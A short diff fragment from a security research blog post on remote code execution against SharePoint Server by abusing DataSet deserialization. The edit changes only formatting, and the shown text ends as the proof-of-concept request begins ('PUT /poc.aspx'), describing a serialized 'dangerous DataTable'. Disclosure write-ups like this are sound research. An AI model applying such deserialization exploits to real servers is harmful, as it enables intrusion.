sourceincite/sourceincite.github.io/_posts/0000-00-00-sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.md

 }
 ```

-<p class="cn" markdown="1">Putting it (almost all) together, I could register a prefix and instantiate the control with a base64 encoded, compressed and serialized, albeit, dangerous `DataTable`:</p>
+Putting it (almost all) together, I could register a prefix and instantiate the control with a base64 encoded, compressed and serialized, albeit, dangerous `DataTable`:

 ```
 PUT /poc.aspx HTTP/1.1